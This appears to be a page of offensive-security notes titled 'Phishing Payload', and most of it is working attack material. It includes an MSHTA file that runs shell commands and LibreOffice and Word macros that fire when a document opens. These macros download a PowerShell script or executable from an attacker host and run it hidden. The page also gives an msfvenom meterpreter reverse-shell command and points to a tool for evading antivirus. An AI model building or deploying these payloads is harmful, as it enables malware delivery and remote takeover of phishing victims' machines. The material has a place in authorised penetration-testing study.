Phishing Payload

Prepare for phishing payload

MSHTA

# simple ping


<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 3 10.10.x.y");
</script>
</head>

<body>
<script language="JScript">
self.close();
</script>
</body>
</html>

LibreOffice (Linux)

If your target have script to open the document, use LibreOffice is a simple way.

  1. Write Documents

  2. Create Macros

Tools > Macros > Organize Macro > Basic

[Basic Macros]

Untitled 1 > New > (give a name)

Macro payload:

Sub Main
    Shell("cmd /c powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1")
    Shell("cmd /c powershell C:/Windows/Tasks/shell.ps1")
End Sub

  1. Tools > Customize > Events [Open Document]

> Macro... > (choose last macro)

  1. Save Document.

Microsoft Word

make sure you save the document as doc or docm. just try that both for your payload.

  1. Write Documents

  2. Create Macros

make sure specify the Macros in to the current document.
View > Macros

[Basic Macros]

"MyMacro" > Create

Macro payload

check the encoded payload below:

Bypass All The Things

  1. Save Document.

Macro

BadAssMacro

Bypass antivirus with this auto genreated macro:

https://github.com/Inf0secRabbit/BadAssMacros

Generate shellcode with format raw

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw > shellcode.raw

Generate VBA

.\BadAssMacrosx64.exe -i shellcode.raw -s indirect -p no -w doc -o out.txt

Copy paste the out.txt to VBA Script.

Standard Format

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://<ATTACKER IP>/testing.exe', 'C:\Windows\Tasks\testing.exe')"
    Dim exePath As String
    exePath = "C:\Windows\Tasks\" + "testing.exe"
    Shell str, vbHide
    Wait (3)
    Shell exePath, vbHide
End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
PreviousSendemailNextBypass All The Things

Last updated